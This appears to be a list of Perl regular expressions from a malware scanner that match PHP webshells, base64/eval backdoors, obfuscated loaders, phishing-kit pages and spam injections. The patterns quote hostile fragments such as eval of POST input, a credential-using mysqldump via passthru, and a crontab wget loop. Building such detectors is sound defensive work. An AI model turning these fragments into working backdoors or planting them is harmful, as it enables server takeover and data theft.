qr/<\?php.+?\*\/\$([O0o]{1,20})=urldecode\(\'\%\d\d.+?\$GLOBALS\[\'([O0o]{1,20})\'\]=\$([O0o]{1,20})\{\d\}.+?eval\(\$GLOBALS\[\'([O0o]{1,20})\'\]\(.+?([A-z0-9]{1,20})\Z/is,
qr/<\?php if\(isset\(\$_POST\[\"cod\\x65\"\]\)\)\{eval\(base64_decode\(\$_POST\[\"co\\x64e\"\]\)\);\}\s+\?>/is,
qr/<\?php if \(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\{eval\(base64_decode\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\);exit;\} \?>/is,
qr/<html>\s+<head>\s+<meta http-equiv=\"refresh\" content=\"2; url=http:\/\/.+?\">\s+<\/head>\s+<body>\s+<h1>Loading\.\.\.<\/h1>\s+<\/body>/is,
qr/<\?php\s+\@error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); if \(count\(\$_POST\) < 2\) \{ die\(PHP_OS\.chr\(.+?preg_split\(\'\/;\/\',strtolower\(\$.+?next\(explode\(\'\@\', \$.+?return \$([A-z0-9]{1,20}); \} \?>/is,
qr/<!--visitorTracker--><\?php \@ob_start\(\);\@ini_set\(\"display_errors\",0\);\@error_reporting\(0\);echo base64_decode\(.+?\"\);\?><!--visitorTracker-->/is,
qr/<\?php\s+if\(!empty\(\$_SERVER\[\'HTTP_USER_AGENT\'\]\)\) \{ \$([A-z0-9_]{1,20}) = array\(\"Google\", \"Slurp\", \"MSNBot\", \"ia_archiver\", \"Yandex\", \"Rambler\", \"StackRambler\"\); if\(preg_match\(\'\/\' \. implode\(\'\|\', \$([A-z0-9_]{1,20})\) \. \'\/i\', \@\$_SERVER\[\'HTTP_USER_AGENT\'\]\)\).+?\$([A-z0-9_]{1,20})\[\]=\@realpath\(\$([A-z0-9_]{1,20})\.DIRECTORY_SEPARATOR\.\$([A-z0-9_]{1,20})\)\.DIRECTORY_SEPARATOR; else continue; .+?return \$([A-z0-9_]{1,20}) ; \} \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'.+?\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\"\",([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20})\)\); \$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20}); \$([A-z0-9_]{1,20})\(\"\"\); \$([A-z0-9_]{1,20})=\(([0-9_]{1,20})-([0-9_]{1,20})\); \$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})-1; \?>/is,
qr/<\?php\s+echo \'<img src=.+?\$xSoftware = trim\(getenv\(\"SERVER_SOFTWARE\"\)\);.+?if \(function_exists\(\"posix_getpwuid\"\) && function_exists\(\"posix_getgrgid\"\)\).+?\?> ;-\) <\/div>\s+<\/div>\s+<\/body>\s+<\/html>>/is,
qr/<\? eval\(base64_decode\(\'([A-z0-9_]{1,20}).+?([A-z0-9_=]{1,20})\'\)\); \?>/is,
qr/<\?php \$([A-z]{1,3})=base64_decode\(\'([A-z0-9=]{1,20})\'\)\.\$_GET\[\'([A-z]{1,3})\'\]\.\'([A-z]{1,3})\';\@\$([A-z]{1,3})\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);\?>([A-z0-9_]{1,20})/is,
qr/<\?php\s+\/\*\s+\* hostname\.php\s+\*\/\s+\$hostname = gethostbyaddr\(\$_SERVER\[\'REMOTE_ADDR\'\]\); \/\/Get User Hostname\s+\$blocked_words = array\(.+?foreach\(\$blocked_words as \$word\) \{.+?\}\s+\?>/is,
qr/<\?php\s+require_once \'hostname\.php\';\s+\$praga=rand\(\);\s+\$praga=md5\(\$praga\);\s+header\(\"location: login\.php.+?\$praga\$praga\"\);\s+\?>/is,
qr/<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4\.01 Transitional\/\/EN\">\s+<html>\s+<head>\s+<title>.+?<body style=\"visibility:hidden\" onload=\"unhideBody\(\)\">.+?new MaskedPassword\(document\.getElementById\(.+?<\/body>\s+<\/html>/is,
qr/<\?php\s+if\(\$_POST\[.+?Apple Info.+?header \(\"Location: index\.php\"\);\s+\}\s+\?>/is,
qr/<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4\.01 Transitional\/\/EN\">\s+<html>\s+<head>\s+<title>.+?<body style=\"visibility:hidden\" onload=\"unhideBody\(\)\">.+?src=\"images\/sbmit\.png\"><\/div>\s+<\/div>\s+<\/body>\s+<\/html>/is,
qr/<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4\.01 Transitional\/\/EN\">\s+<html>\s+<head>\s+<title>.+?<body style=\"visibility:hidden\" onload=\"unhideBody\(\)\">.+?src=\"images\/apl\.gif\" alt=\"\" title=\"\" border=0 width=77 height=77><\/div>\s+<\/div>\s+<\/body>\s+<\/html>/is,
qr/<\?\s+include\(\'blocker\.php\'\);\s+\$DIR=md5\(rand\(0,100000000000\)\);.+?fwrite\(\$file,\$ip\.\" - \"\.gmdate \(\"Y-n-d\"\)\.\" \@ \"\.gmdate \(\"H:i:s\"\)\.\"\\n\"\);\s+\?>/is,
qr/<\?php\s+\$hostname = gethostbyaddr\(\$_SERVER\[\'REMOTE_ADDR\'\]\);\s+\$blocked_words = array\(\"above\",\"google\",\"softlayer\",\"amazonaws\",\"cyveillance\",\"phishtank\",\"dreamhost\",\"netpilot\",\"calyxinstitute\",\"tor-exit\", \"paypal\"\);.+?foreach\(\$bannedIP as \$ip\) \{\s+if\(preg_match\(\'\/\' \. \$ip \. \'\/\',\$_SERVER\[\'REMOTE_ADDR\'\]\)\)\{\s+header\(\'HTTP\/1\.0 404 Not Found\'\);.+?\'facebookexternalhit\'\) !== false\) \{ header\(\'HTTP\/1\.0 404 Not Found\'\); exit; \}\s+\?>/is,
qr/<\?php error_reporting\(0\);\$([A-z0-9_=]{1,20})=\"([A-z0-9_=]{1,20})\";eval\(base64_decode\(\"([A-z0-9_=]{1,20}).+?([A-z0-9_=]{1,20})\"\)\); \?>/is,
qr/<\?php\s+\$([A-z0-9_=]{1,3}) = \"([A-z0-9_=]{20,}).+?\$_REQUEST\[\'([A-z0-9_=]{1,20})\'\]\(\"\{\$_REQUEST\[\'([A-z0-9_=]{1,20})\'\]\}\(\{\$_REQUEST\[\'([A-z0-9_=]{1,20})\'\]\}\(\'\{\$([A-z0-9_=]{1,3})\}\'\)\);\"\);\s+\?>/is,
qr/<form action=\"\" method=\"post\"><input type=\"text\" name=\"_f__f\" value=\"\"\/><input type=\"submit\" value=\"&gt;\"\/><\/form>/is,
qr/<\?php copy\(\'http:\/\/dl\.dropboxusercontent\.com\/s\/([A-z0-9]{1,20})\/([A-z0-9]{1,20})\.zip\',\'([A-z0-9]{1,20})\.php\'\);exit; \?>/is,
qr/<\?php error_reporting\(0\);\$\w=\"\w\";\$\w=\"([A-z0-9_=]{1,20})\";eval\(base64_decode\(.+?\)\); \?>/is,
qr/<\?php error_reporting\(0\);if\(isset\(\$_POST\[\"\w\"\]\) and isset\(\$_POST\[\"\w\"\]\)\)\{if\(isset\(\$_POST\[\"input\"\]\)\)\{\$user_auth=\"&l=\"\.base64_encode\(\$_POST\[\"\w\"\]\).+?\{print \"sys_active\"\.\`uname -a\`;\}\} \?>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\'base\'\.\(32*2\)\.\'_de\'\.\'code\';\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\(str_replace\(\"\\n\", \'\', \'([A-z0-9_]{20,}).+?<form action=\"\" method=\"post\"><input type=\"text\" name=\"([A-z0-9_]{1,20})\" value=\"\"\/><input type=\"submit\" value=\"&gt;\"\/><\/form>/is,
qr/<\?php.+?\$xml = \$\w->response->asXML\(\);\s+echo base64_encode\(\$xml\);.+?\$xml_str = base64_decode\(\$str\);.+?echo \" error num: \"\.\$errno\.\' : \'\.\$errstr;\s+\}\s+\}\s+\}\s+\?>/is,
qr/\/\/([A-z0-9+\/]{500,})\Z/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20}).+?([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})\)eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\).+?([A-z0-9_]{1,20});([A-z0-9_]{1,20})\';/is,
qr/<\?php.+?\$login=\"([A-z0-9_]{1,20})\";\s+\$md=str_rot13\(\"([A-z0-9_]{1,20})\"\);\s+\$mdh = str_rot13\(\'([A-z0-9_]{1,20})\'\);\s+\$md5_pass=\"([A-z0-9]{32})\";.+?eval\(\$mdh\(\$md\(strrev\(.+?\s+\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?exit,\$([A-z0-9_]{1,20})\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\).+?([A-z0-9_]{1,20})\)\';/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?\$([A-z0-9_]{1,20})\)\)die;eval\(\$([A-z0-9_]{1,20})\(\/\*([A-z0-9_]{1,20})\'\..+?\(([A-z0-9_]{1,20})\)\';/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?if\(!\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\),\$([A-z0-9_]{1,20})\)\)eval\(\$([A-z0-9_]{1,20})\(\$.+?\(([A-z0-9_]{1,20});([A-z0-9_]{1,20}),([A-z0-9_]{1,20})\';/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?\)eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\);.+?([A-z0-9_]{1,20})\';/is,
qr/<\?php \/\* WARNING: This file is protected by copyright law\. To reverse engineer or decode this file is strictly prohibited\. \*\/\s+\$\w=\"([A-z0-9]{20,}).+?\";eval\(base64_decode\(\".+?\"\)\);return;\?>/is,
qr/<\?php error_reporting\(0\);\$\w=\"eval\(base64_decode\(.+?\"\)\); \?>/is,
qr/<\?php if\(isset\(\$_POST\[([A-z0-9_]{1,20})\]\)\)\{passthru\(\$_POST\[([A-z0-9_]{1,20})\]\); die\(\);\} include\(\"\.\.\/includes\/configure\.php\"\); passthru\(\"mysqldump -u\"\.DB_SERVER_USERNAME\s+\. \" --password=\" \. DB_SERVER_PASSWORD \. \" --all-databases\"\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\"b\"\.\"ase\"\.\"64_de\"\.\"code\";eval\(\$([A-z0-9_]{1,20})\(\".+?\)\);/is,
qr/<\? \/\*\*\/eval\(base64_decode\(\'aWYo.+?\'\)\); \?>/is,
qr/<\?php\s+\/\/Starting calls\s+if \(!function_exists\(\"getmicrotime\"\)\).+?<\/body><\/html><\?php chdir\(\$lastdir\); N3tshexit\(\); \?>/is,
qr/<\?\s+if\(!empty\(\$_SERVER\[\'HTTP_USER_AGENT\'\]\)\) \{.+?move_uploaded_file\(\$_FILES\[.+?fotTKL\(\$gaza_text,\$gaza_text1,\$dir\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?array\(\'ba\' ,\'se\' ,\'64\' ,\'_d\' ,\'ec\' ,\'od\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzun\', \'comp\', \'ress\'\) ;\$([A-z0-9_]{1,20}) = .+?eval.+?\) \) \) \) ; \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'s\'\.chr\(116\)\.\'rrev\';\$([A-z0-9_]{1,20}) = array\(\'.+?\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/\/\*([A-z0-9]{1,6})\*\/\s+\@include \"\\([A-z0-9]{1,6})\\([A-z0-9]{1,6})\\([A-z0-9]{1,6}).+?([A-z0-9]{1,6})\\([A-z0-9]{1,6})\";\s+\/\*([A-z0-9]{1,6})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,6})=\$_REQUEST\[\'sort\'\];\$([A-z0-9]{1,6})=\'\';\$([A-z0-9]{1,6})=\"wt8m4.+?\$([A-z0-9]{1,6})=strrev\(\"noi\"\.\"tcnuf\"\.\"_eta\"\.\"erc\"\);\$([A-z0-9]{1,6})=\$([A-z0-9]{1,6})\(\"\",\$([A-z0-9]{1,6})\(\$([A-z0-9]{1,6})\)\);\$([A-z0-9]{1,6})\(\);.+?\$_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\'<b>Success_Upload!!!<\/b><br><br>\';\}else\{echo\'<b>Error<\/b><br><br>\';\}\};\};/is,
qr/<\?php \@ini_set\(\"error_log\",null\);\@ini_set\(\"log_errors\",0\);\@ini_set\(\"max_execution_time\",0\);\@set_time_limit\(0\);error_reporting\(0\).+?\)\{\}else\{file_put_contents\(\$.+?\);\}else\{([A-z0-9]{1,6})_\(\$_SERVER\[\'DOCUMENT_ROOT\'\]\);\}\}\}\}\}\}\}\};/is,
qr/<\?php\s+\@ini_set\(\"display_errors\", \"0\"\);.+?if \(!\$npDcheckClassBgp\) \{.+?\$npDcheckClassBgp = \"([A-z0-9]{1,6})\";\s+\}\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\'ba\'\.\'s\'\.\'e6\'\.\'4_\'\.\'de\'\.\'code\'; \@eval\(\$([A-z0-9_]{1,20})\(.+?\'\)\);/is,
qr/<\?php\s+ignore_user_abort\(\);.+?system\(base64_decode\(.+?system\(\'echo \"\* \* \* \* \* wget http:\/\/\'\.\$_SERVER\[\"HTTP_HOST\"\]\.\$_SERVER\[\"REQUEST_URI\"\]\.\'\" \| crontab\'\);\s+\?>/is,
qr/<\?php for\(\$o=0,\$e=\'&\\\'\(\)\*\+,-\.:\].+?\(:\)^\',\$d=\'\';\@ord\(\$e\[\$o\]\);\$o\+\+\)\{if\(\$o<16\)\{\$h\[\$e\[\$o\]\]=\$o;\}else\{\$d\.=\@chr\(\(\$h\[\$e\[\$o\]\]<<4\)\+\(\$h\[\$e\[\+\+\$o\]\]\)\);\}\}eval\(\$d\); \?>/is,
qr/<\?php\s+\$ver = \'abcdefghijklmnopqrstuvwxyz\';\s+\$check = \$ver\{.+?\(\$check\(array\(\'\\n\', \';\'\).+?value=\"&amp;\"\/><\/form>/is,
qr/<\?php\s+\@error_reporting\(0\);\@set_time_limit\(0\);\s+\$code=\"%3B.+?\$code=\@urldecode\(\$code\);\$code=\@strrev\(\$code\);\@eval\(\$code\);\s+\?>/is,
qr/\\<\?php \$([A-z0-9_]{1,20})=\"([A-z0-9_]{50,})\"; \$([A-z0-9_]{1,20}) = str_replace\(\"b\",\"\",\"bsbtbrb_rbebpblacbe\"\);.+?\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\"z\",\"\",\"crzezatez_fzunctzizon\"\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\"\", \$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\"hd\", \"\", \$([A-z0-9_]{1,20})\.\$([A-z0-9_]{1,20})\.\$([A-z0-9_]{1,20})\.\$([A-z0-9_]{1,20})\)\)\); \$([A-z0-9_]{1,20})\(\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \"a\" \. \"\\x73\" \. \"\" \. \"\\x73\" \. \"E\" \. \"\\x72\" \. \"t\";\@\$.+?\"\\x29\" \. \"\\x29\" \. \"\" \. \"\\x29\" \. \"\\x3b\"\);exit;/is,
qr/<\?php if\(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\(\$([A-z0-9_]{1,20})= \$_POST\[\'([A-z0-9_]{1,20})\'\]\) && \@preg_replace\(\'\/ad\/e\',\'\@\'\.str_rot13\(\'riny\'\)\.\'\(\@eval\(base64_decode\(\$_POST\[([A-z0-9_]{1,20})\]\)\);\)\', \'add\'\);\}/is,
qr/<\?php class Bx\{static private \$_alpha=\".+?break;\}return implode\(\"\",\$x\);\}\}\$Bx=new Bx\(\);\@eVaL\(\$Bx->d\(\'.+?\'\)\);/is,
qr/<title>Vuln!! patch it Now!<\/title>\s+<\?php\s+echo \'<form action=\"\".+?Shell Uploaded ! :\)<b><br><br>\'; \}\s+else \{ echo \'<b>Not uploaded ! <\/b><br><br>\'; \}\s+\}\s+\?>/is,
qr/<\? eval\(gzinflate\(strrev\(unserialize\(str_rot13\(base64_decode\(.+?\)\)\)\)\)\); \?>/is,
qr/<\?php \$ip = getenv\(\"REMOTE_ADDR\"\);.+?Link Mailer.+?mail\(\$bilsnd,\$bilsub,\$bilsmg,\$bilhead,\$message\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'\'\.chr\(115\)\.\'trre\'\.chr\(118\)\.\'\';\$([A-z0-9_]{1,20}) = array\(.+?\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php.+?\[uname\]\"\.php_uname\(\)\.\"\[\/uname\]\".+?Go Xsender.+?<\/html>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\'base6\'\.\'4\'\.\'_d\'\.\'eco\'\.\'de\'\.\'\'; \@eval\(\$([A-z0-9_]{1,20})\(.+?\'\.\'\'\)\);/is,
qr/<\?php if\(!function_exists\(.+?\.\'\/scopbin\';clearstatcache\(\);if\(!is_dir\(\$.+?\'; eval\(.+?\)\);\?>/is,
qr/<\?php \/\*([0-9]{1,20})\*\/ error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'display_errors\',\'Off\'\); \@eval\( base64_decode\(\'aWYo.+?\)\); \@ini_restore\(\'error_log\'\); \@ini_restore\(\'display_errors\'\); \/\*([0-9]{1,20})\*\/ \?>/is,
qr/<\?php\s+\@error_reporting\(0\);\@set_time_limit\(0\);\s+\$code=\"%3B.+?\$code=\@urldecode\(\$code\);\$code=\@strrev\(\$code\);\@eval\(\$code\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'gz\'\. \'un\'\. \'co\'\. \'mp\'\. \'re\'\. \'ss\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'i\' \.\'m\' \.\'p\' \.\'l\' \.\'o\' \.\'d\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'s\'\.chr\(116\)\.\'r\'\.chr\(114\)\.\'e\'\.chr\(118\)\.\'\';\$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'ed\'\.chr\(111\)\.\'c\'\.chr\(101\)\.\'\'\.chr\(100\)\.\'_4\'\.chr\(54\)\.\'\'\.chr\(101\)\.\'\'\.chr\(115\)\.\'\'\.chr\(97\)\.\'\'\.chr\(98\)\.\'\'\);\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'edolpmi\'\);\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'et\'\.\'al\'\.\'fn\'\.\'iz\'\.\'g\'\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzu\', \'nco\', \'mpr\', \'ess\'\) ;\$([A-z0-9_]{1,20}) = \'\'\.chr\(105\)\.\'\'\.chr\(109\)\.\'\'\.chr\(112\)\.\'l\'\.chr\(111\)\.\'de\' ; \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); eval \( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \'\', \$([A-z0-9_]{1,20}) \) \) \) \) ; \?>/is,
qr/<\? session_start\(\);\?> <html> <head><title>PHP Unzipper Spammer Tn Dz Maroc ! All Arabs<\/title>.+?\} \} \} echo \"<\/div>\";\} \?> <\/body> <\/html>\s+\/\* Mister Spy \*\//is,
qr/<\?php.+?\$d0mains = \@file\(\'\/etc\/named\.conf\'\);\s+\$domains = scandir\(\"\/var\/named\"\);.+?3xp1r3 Cyber Army\";\s+echo \"<\/body><\/html>\";\s+\?>/is,
qr/<\?php \$username = \"admin\"; \$password =.+?<h3> Safe Mode Fucker <\/h3>.+?Masspass\.php Done !<\/font><\/center>\"; \} break; \} \}\}\s+\?>/is,
qr/<link rel=\'shortcut icon\' href=\'http:\/\/www\.dz-streaming\.eu\/favicon\.ico\'>.+?eval\(\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28.+?\\x29\\x29\\x29\\x3B\"\);\s+\?>/is,
qr/<\?php \/\*([0-9]{1,20})\*\/ error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'display_errors\',\'Off\'\); \@eval\( base64_decode\(\'.+?\)\); \@ini_restore\(\'error_log\'\); \@ini_restore\(\'display_errors\'\); \/\*([0-9]{1,20})\*\/ \?>/is,
qr/<\?php.+?Carding Argentina.+?\$wso =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$wso\)\)\)\)\)\);.+?\?>\?><\?.+?value=\"Submit\"><\/form>\';\}\}\?>/is,
qr/<\?php \$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x61j\\x76q\\x6c\\x65\\x69\\x66\"\]=\"\\x63\";if\(isset\(\$_GET\[\"a\\x62\\x63\\x311\"\]\)\)\{\$([A-z0-9_]{1,20})="\x63";\$\{\$([A-z0-9_]{1,20})\}=base64_decode\(\".+?\"\)\.\"([A-z0-9_]{1,20})\";\@\$\{\$\{\"GLOB\\x41\\x4c\\x53\"\}\[\"\\x61\\x6a\\x76\\x71l\\x65\\x69\\x66\"\]\}\(\$_POST\[\"\\x78\"\]\);exit\(\);\}\?>/is,
qr/<\?php.+?<title>pastrulo<\/title>.+?\)\);\?>\'\)\);/is,
qr/<\?php\s+\$\w=\"\\x62\";\$\w=\"\\x65\".+?eval\( \$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(.+?\)\)\);\s+\?>/is,
qr/<\?php\s+\@error_reporting\(0\);\s+\@set_time_limit\(0\);\s+\$code = \".+?\@eval\(gzinflate\(base64_decode\(\$code\)\)\);\?>/is,
qr/<\?php \@ini_set\(\'display_errors\',0\).+?CPANEL CRACKER.+?s3curity\.tn \"; \?>\s+<\?\(\@copy\(\$_FILES\[\'f\'\]\[\'tmp_name\'\], \$_FILES\[\'f\'\]\[\'name\'\]\)\);\?>/is,
qr/<html>\s+<head>\s+<title>\s+Dark Shell.+?<h1>Dark Shell<\/h1>.+?\$items = scandir \(\$file\);.+?echo \"<\/table>\\n\";\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'gzun\'\. \'comp\'\. \'ress\';\$([A-z0-9_]{1,20}) = \'b\' \.\'a\' \.\'s\' \.\'e\' \.\'6\' \.\'4\' \.\'_\' \.\'d\' \.\'e\' \.\'c\' \.\'o\' \.\'d\' \.\'e\';\$([A-z0-9_]{1,20}) = \'imp\' \.\'lod\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php\s+set_time_limit\(0\);\s+error_reporting\(0\);\s+\$auth_pass.+?\/\/ con7extwebshell\s+\$con7ext2 =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$con7ext2\)\)\)\)\)\);/is,
qr/<\?php.+?\$auth_pass =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$([A-z0-9_]{1,20})\)\)\)\)\)\);/is,
qr/<\? \$([A-z0-9_]{1,20})=\$_GET\[\'hamza\'\].+?\@move_uploaded_file\(\$userfile_tmp.+?value=\"Submit\"><\/form>\';\}\}\?>/is,
qr/<html>\s+<head>\s+<title>Symlink Get Config.+?echo system\(\'ls \/var\/mail\'\);.+?symlink\(\'\/var\/www\/html\/include\/connect\.php\',\'OTHER\.txt\'\);.+?\?>\s+<\/td><\/table><\/body><\/html>/is,
qr/<\?php\s+function query_str\(\$params\)\{.+?Priv8.+?sent successfully\'\); <\/script>\";\}\}\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php print_r\(eval\(\$_POST\[0\]\)\);/is,
qr/<\?php if\(\$_GET\[\"login\"\].+?\$([A-z0-9_]{1,20})=base64_decode\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\); \@eval\(\"\\\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20});\"\);\}.+?value=\"submit\"\/><\/form>/is,
qr/<\?php\s+error_reporting\(0\);\s+if\(array_keys\(\$_GET\)\[0\] == \'([A-z0-9_]{1,20})\'\)\{\s+\$spacer_open\s+\{\$\{eval\(base64_decode\(.+?\'\)\)\}\}\{\$\{exit\(\)\}\}&\s+\$_phpinclude_output;/is,
qr/<\?php.+?\$auth_pass =.+?eval\(gzinflate\(str_rot13\(base64_decode\(.+?\)\)\)\);\s+\?>/is,
qr/<\?php if\(empty\(\$_GET\[\'ineedthispage\'\]\) && \$_SERVER\[\'REQUEST_URI\'\]!=\"\/\" && \$_SERVER\[\'REQUEST_URI\'\]!=\"\/index\.php\" && !empty\(\$_SERVER\[\'REQUEST_URI\'\]\)\) \{ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?;\};\s+\/\/item->alias\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'strr\'\.chr\(101\)\.\'v\';\$([A-z0-9_]{1,20}) = array\(.+?eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php\s+\/\*\*\s+\* Plugin Name: Login Wall.+?if \(!defined\(\'LoginWall\'\)\)\{\s+define\( \'LoginWall\',1\);.+?add_action\(\'login_form\',\'fs_login_session\'\);\s+\}/is,
qr/<\?php if\(\$_POST\[\'([A-z0-9_]{1,20})\'\]==\'\'\)\{echo\(\'->\|OK\|-<\'\);exit\(\);\}eval\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);\?>/is,
qr/<\?php \/\*Packed BLOB icon data\. Corruption may result script execution errors\. Don\'t touch it unless you know what you are doing\.\*\/ eval\(base64_decode\(.+?\)\);\?>/is,
qr/<div class=\"product_listing_descrip\">.+?<a href=\"http\:\/\/.+?generic levitra.+?alt=\"viagra\">viagra<\/a><\/div>/is,
qr/<script type=\"text\/javascript\">eval\(unescape\(\" \%76\%61.+?\%3B\%7D \"\)\)<\/script><\/div>/is,
qr/<\?php\s+function_exists\(\'date_default_timezone\'\) \? date_default_timezone_set\(\'America\/Los_Angeles\'\) : \@eval\(base64_decode\(\$_REQUEST\[\'c_id\'\]\)\);/is,
qr/<\?PHP\s+define\(\'REAL_SERVER_ROOT\', \'SERVER\'\);.+?define\(\'SYSTEM_SKEL_DIR\', \'skel\'\) \? \@eval\(base64_decode\(\$_REQUEST\[\'c_id\'\]\)\) : define\(\'SYSTEM_SKEL_PATH\', SYSTEM_CONF_PATH \. \'\/\' \. SYSTEM_SKEL_DIR\);.+?define\(\'WORKGROUPS_META_SETTINGS_FILENAME\', \'settings\.xml\'\);\s+\?>/is,
qr/<\?php if\(\$_GET\[\'test\'\]\)\{echo \'success\';\}else\{\(\$www= \$_POST\[\'([A-z0-9_]{1,20})\'\]\) && \@preg_replace\(\'\/ad\/e\',\'@\'\.str_rot13\(\'riny\'\)\.\'\(\$www\)\', \'add\'\);\}/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/ error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'display_errors\',\'Off\'\); \@eval\( base64_decode\(\'aWYo.+?\)\); \@ini_restore\(\'error_log\'\); \@ini_restore\(\'display_errors\'\); \/\*([A-z0-9_]{1,20})\*\/ \?>/is,
qr/<script type=\"text\/javascript\"><\/script><script type=\"text\/javascript\">var _0x2515=\[\"\",\"\\x6A\\x6F\\x69\\x6E\".+?\(_0x2515\[0\]\)\);<\/script>/is,
